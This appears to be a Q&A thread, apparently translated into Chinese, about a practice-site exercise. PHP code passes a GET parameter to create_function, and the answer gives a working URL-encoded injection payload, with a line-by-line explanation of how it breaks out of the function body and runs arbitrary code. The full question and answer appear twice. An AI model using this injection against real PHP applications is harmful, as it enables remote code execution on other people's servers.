PHP 代码注入无效
PHP code injection not working
我发现了一个网站,您可以在其中进行一些有关网络安全的练习。
据我了解,您必须进行 PHP 注射。我在网上查找示例,但仍然无法实现它们。
如有任何帮助或提示,我们将不胜感激,如果这里不适合提出此类问题,请告诉我。
代码:
<body>
<div class="corb-centered corb-php text-center">
<h3>
<a target="_blank" href="/index.php?source">source</a>
</h3>
<h3>
Start here : <a href="/index.php?code=echo 'hello foobar';">Hello foobar</a>
</h3>
<div class="text-left">
<h3>Output : </h3>
<pre><code><?php
if (isset($_GET['code'])) {
$new_func = create_function('', $_GET['code']);
if ($_GET['code'] === "echo 'hello foobar';") {
$new_func();
}
}
?></code></pre>
</div>
</div>
</body>
我已经尝试了我所知道的一切:
ls']); $new_func();//
ls']); $new_func(); print('
ls; $new_func();//
ls''); $new_func();//
...
根据 PHP docs:
Caution This function internally performs an eval() and as such has the same security issues as eval().
这正是本例中可以利用的内容。 PHP 基本上只是将 function __lambda_func(<args>) {<code>}
粘合在一起,然后对其求值。
使用以下代码参数应输出字符串 do something else..
.
/index.php?code=%7D%20%24_GET%5B%27code%27%5D%20%3D%20"echo%20%27hello%20foobar%27%3B"%3B%20echo%20%27do%20something%20else..%27%3B%20%2F%2F
解码版本:
} $_GET['code'] = "echo 'hello foobar';"; echo 'do something else..'; //
解释版本:
} # end the function body prematurely so the following code is executed immediately
$_GET['code'] = "echo 'hello foobar';"; # trick the IF check by overwriting what's actually in $_GET['code']
echo 'do something else..'; # any code that should be executed goes here
// # comment out the function-body closing brace that is added by PHP after the code
我发现了一个网站,您可以在其中进行一些有关网络安全的练习。
据我了解,您必须进行 PHP 注射。我在网上查找示例,但仍然无法实现它们。
如有任何帮助或提示,我们将不胜感激,如果这里不适合提出此类问题,请告诉我。
代码:
<body>
<div class="corb-centered corb-php text-center">
<h3>
<a target="_blank" href="/index.php?source">source</a>
</h3>
<h3>
Start here : <a href="/index.php?code=echo 'hello foobar';">Hello foobar</a>
</h3>
<div class="text-left">
<h3>Output : </h3>
<pre><code><?php
if (isset($_GET['code'])) {
$new_func = create_function('', $_GET['code']);
if ($_GET['code'] === "echo 'hello foobar';") {
$new_func();
}
}
?></code></pre>
</div>
</div>
</body>
我已经尝试了我所知道的一切:
ls']); $new_func();//
ls']); $new_func(); print('
ls; $new_func();//
ls''); $new_func();//
...
根据 PHP docs:
Caution This function internally performs an eval() and as such has the same security issues as eval().
这正是本例中可以利用的内容。 PHP 基本上只是将 function __lambda_func(<args>) {<code>}
粘合在一起,然后对其求值。
使用以下代码参数应输出字符串 do something else..
.
/index.php?code=%7D%20%24_GET%5B%27code%27%5D%20%3D%20"echo%20%27hello%20foobar%27%3B"%3B%20echo%20%27do%20something%20else..%27%3B%20%2F%2F
解码版本:
} $_GET['code'] = "echo 'hello foobar';"; echo 'do something else..'; //
解释版本:
} # end the function body prematurely so the following code is executed immediately
$_GET['code'] = "echo 'hello foobar';"; # trick the IF check by overwriting what's actually in $_GET['code']
echo 'do something else..'; # any code that should be executed goes here
// # comment out the function-body closing brace that is added by PHP after the code